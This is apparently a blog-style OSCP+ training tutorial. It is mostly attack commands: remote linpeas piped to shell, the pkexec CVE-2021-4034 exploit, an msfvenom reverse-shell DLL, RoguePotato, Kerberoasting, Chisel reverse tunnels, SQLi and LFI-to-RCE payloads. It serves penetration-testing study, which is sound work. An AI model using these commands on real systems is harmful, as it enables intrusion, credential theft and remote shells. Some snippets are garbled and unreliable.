Zero to OSCP+: Exploiting Active Directory, Linux PrivEsc & Pivoting Like a Pro – Hands-On CTF Training + Video

Listen to this Post

Featured Image

Introduction:

The OSCP+ certification demands more than theoretical knowledge—it requires practical mastery of real-world attack chains, from initial enumeration to domain compromise. This article extracts core techniques from Ignite Technologies’ CTF practice program, delivering actionable commands and methodologies to simulate exam-like environments, covering Windows/Linux privilege escalation, tunneling, and Active Directory attacks.

Learning Objectives:

  • Execute systematic information gathering and vulnerability scanning using Nmap, Rustscan, and automated enumeration scripts.
  • Perform Linux and Windows privilege escalation through kernel exploits, misconfigurations, and service hijacking.
  • Conduct Active Directory attacks, including Kerberoasting, Pass-the-Hash, and ACL abuse, with proper pivoting techniques.

You Should Know:

  1. Network Enumeration & Service Discovery – The Foundation of Every CTF

Start your engagement by mapping the attack surface. Use the following commands to identify live hosts, open ports, and running services.

Linux Commands:

 Discover live hosts on the local subnet
nmap -sn 192.168.1.0/24

Aggressive service scan with default scripts
nmap -sC -sV -p- -T4 10.10.10.10 -oA full_scan

Faster alternative with Rustscan (parallelized)
rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sV

Enumerate UDP services (often overlooked)
nmap -sU --top-ports 100 10.10.10.10

Windows Equivalent (PowerShell):

 Test-NetConnection for basic port scan
1..1024 | ForEach-Object { Test-NetConnection 10.10.10.10 -Port $_ -WarningAction SilentlyContinue } | Where-Object {$_.TcpTestSucceeded}

Use PortQry for advanced enumeration
portqry.exe -n 10.10.10.10 -e 53 -p UDP

Step-by-Step Guide:

  • Run a ping sweep to identify live targets: `nmap -sn `
    – Perform a full TCP port scan on discovered hosts: `nmap -p- –min-rate 1000 `
    – Follow with version detection and default scripts on open ports: `nmap -sC -sV -p `
    – Enumerate common UDP services (DNS, SNMP, NTP) with `-sU`
    – Save output in grepable format for automated parsing: `-oG greppable.txt`

    This methodology mirrors the OSCP+ approach: never skip initial enumeration, as hidden services (e.g., 8080, 3306, 6379) often lead to initial footholds.

  1. Linux Privilege Escalation – From Low User to Root

After gaining a low-privilege shell, escalate using kernel exploits, SUID binaries, or cron jobs. Below are verified techniques and commands.

Automated Enumeration:

 LinPEAS – Comprehensive privilege escalation audit
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Manual checks
sudo -l  Check sudo rights
find / -perm -4000 -type f 2>/dev/null  List SUID binaries
crontab -l && ls -la /etc/cron  Examine cron jobs

Exploiting SUID Binary (Example with `pkexec` – CVE-2021-4034):

 Check if pkexec is SUID
which pkexec && ls -la $(which pkexec)

Download exploit
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034  Spawns root shell

Windows Privilege Escalation Commands (PowerShell):

 WhoAmI and privileges
whoami /priv | Out-String
Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10

Check AlwaysInstallElevated registry key
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Unquoted service path detection
Get-WmiObject win32_service | Select-Object Name, StartName, PathName | Where-Object {$<em>.PathName -notlike '""'} | Where-Object {$</em>.PathName -like ' '}

Step-by-Step Guide:

  • Upload linpeas.sh to the target using `wget` or `certutil`
    – Run it and analyze the highlighted (red/yellow) findings
  • Check kernel version: `uname -a` – search for public exploits (e.g., DirtyPipe, OverlayFS)
  • For Windows, run `winPEAS.exe` or `PowerUp.ps1` from PowerSploit
  • Always verify exploit reliability before execution; unstable exploits may crash the service
  1. Windows Privilege Escalation – Token Manipulation & Potentially Unwanted Programs

Windows environments often contain misconfigured services, weak permissions, or vulnerable drivers. Use these techniques to elevate.

Token Impersonation (Juicy Potato / RoguePotato):

 List available tokens (requires SeImpersonate or SeAssignPrimaryToken)
whoami /priv
 If SeImpersonatePrivilege is present, download RoguePotato
RoguePotato.exe -r 10.10.14.10 -e "cmd.exe" -l 9999

DLL Hijacking via Path Environment Variable:

 Check if a service loads a missing DLL from a writable directory
 Using Process Monitor to detect "NAME NOT FOUND" errors
 Then compile a malicious DLL with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f dll -o hijack.dll

Step-by-Step Guide:

  • Enumerate Windows services with `sc query` or `Get-Service`
    – Look for services running as SYSTEM with weak permissions (AllAccess for Users)
  • Use `accesschk.exe` to check service configuration: `accesschk.exe -uwcqv “Authenticated Users” `
    – If a service binary is writable, replace it with a reverse shell executable and restart the service (or wait for reboot)
  • For SeImpersonate, trigger a COM service (e.g., BITS) and use RoguePotato to get SYSTEM
  1. Active Directory Attacks – Kerberoasting, AS-REP Roasting, and ACL Abuse

Active Directory is a core OSCP+ topic. Below are commands for common attack paths using Impacket and PowerView.

Linux (Impacket) – Kerberoasting:

 GetUserSPNs to request service tickets
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN/username:password -request

Crack the hash with John or Hashcat
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Windows (PowerView) – AS-REP Roasting:

 Import PowerView
Import-Module .\PowerView.ps1

Find users with DONT_REQ_PREAUTH set
Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName

Request AS-REP hash for each
Get-DomainUser -PreauthNotRequired | Get-DomainSPNTicket | Select-Object Hash

Step-by-Step Guide:

  • Enumerate AD domain users and groups with `enum4linux` or `ldapsearch`
    – Use `BloodHound` to map attack paths: run SharpHound.exe on a Windows target, ingest data into BloodHound
  • Identify high-value targets (Domain Admins, Enterprise Admins)
  • If you have a low-privilege AD account, perform Kerberoasting to crack service account passwords
  • Abuse ACLs using `DACL` edges in BloodHound (e.g., GenericWrite on a user allows RBCD attack)

5. Tunneling & Pivoting – Accessing Internal Networks

After compromising one host, pivot to the internal network using SSH tunneling or Chisel.

Chisel – Reverse SOCKS Proxy (Linux/Windows):

 Attacker machine (listener)
chisel server --reverse -p 8000

Compromised target (client)
chisel client <attacker_IP>:8000 R:socks

SSH Local Port Forwarding:

 Forward remote port 3389 (RDP) to local port 13389
ssh -L 13389:internal_host:3389 user@jumphost

Now connect to localhost:13389 to RDP into internal_host

Metasploit Pivoting (Meterpreter):

run autoroute -s 192.168.10.0/24
background
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
run
 Use proxychains with socks5 127.0.0.1 1080

Step-by-Step Guide:

  • On the compromised host, identify internal networks with `ipconfig` or `ifconfig`
    – Use `proxychains` with dynamic SOCKS to route tools like Nmap through the pivot
  • For Windows targets, use `plink.exe` (PuTTY Link) to create SSH tunnels if SSH is available
  • For restrictive environments, use `socat` or `netsh` to forward ports
  • Remember to add `proxychains` before each command: `proxychains nmap -sT -Pn 192.168.10.1`
  1. Web Application Attacks – SQLi, XSS, and LFI to RCE

Web apps often provide the initial foothold. Use these manual and automated techniques.

SQL Injection (Manual Boolean-Based):

' OR '1'='1' -- -
' UNION SELECT username, password FROM users --

Using sqlmap for Automated Exploitation:

 Dump database with risk and level high
sqlmap -u "http://target.com/page?id=1" --dbs --batch --risk=3 --level=5

OS shell if MySQL allows INTO OUTFILE
sqlmap -u "http://target.com/page?id=1" --os-shell

Local File Inclusion to Remote Code Execution (via PHP Wrappers):

http://target.com/index.php?page=../../../../etc/passwd
http://target.com/index.php?page=php://filter/convert.base64-encode/resource=config.php
http://target.com/index.php?page=data://text/plain,<?php system('id'); ?>

Step-by-Step Guide:

  • Intercept requests with Burp Suite or OWASP ZAP
  • Test for SQLi by injecting single quotes and observing errors
  • For LFI, try common files: /etc/passwd, `C:\Windows\win.ini`
    – Combine LFI with log poisoning: include Apache access logs after injecting PHP code via User-Agent
  • Use `wfuzz` to fuzz parameters and directories: `wfuzz -c -w /usr/share/wordlists/dirb/common.txt -u http://target.com/FUZZ`

What Undercode Say:

  • Enumerate relentlessly – The OSCP+ exam rewards thorough scanning; missed services often contain critical vulnerabilities.
  • Master privilege escalation – Both Linux and Windows escalations are high-yield; practice with vulnerable machines (HackTheBox, TryHackMe).
  • Active Directory is non-negotiable – Learn Kerberos attacks, SMB relay, and ACL abuse; BloodHound is your best friend.
  • Tunneling bridges the gap – Real-world engagements require pivoting; master Chisel and SSH dynamic forwarding.
  • Web apps are entry points – SQLi and LFI remain prevalent; manual testing beats full automation for bypassing WAFs.
  • Automate judiciously – Tools like LinPEAS and PowerUp save time, but always verify output manually.
  • Practice report writing – Professional documentation of findings and remediation steps distinguishes a pentester from a script kiddie.

Prediction:

By 2027, OSCP+ and similar certifications will incorporate AI-assisted attack simulations, requiring candidates to evade machine learning–based detection systems and exploit large language model (LLM) injection flaws in enterprise applications. Hands-on CTF platforms like Ignite Technologies’ program will evolve to include cloud-native environments (AWS, Azure) and container breakout scenarios, making multi-cloud privilege escalation a core skill. Aspiring red teamers who focus on foundational enumeration, AD abuse, and tunneling today will adapt seamlessly to these changes, while those relying solely on automated tools will struggle. The future of ethical hacking demands creativity, not just memorization of exploits.

▶️ Related Video (74% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Oscp Exam – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky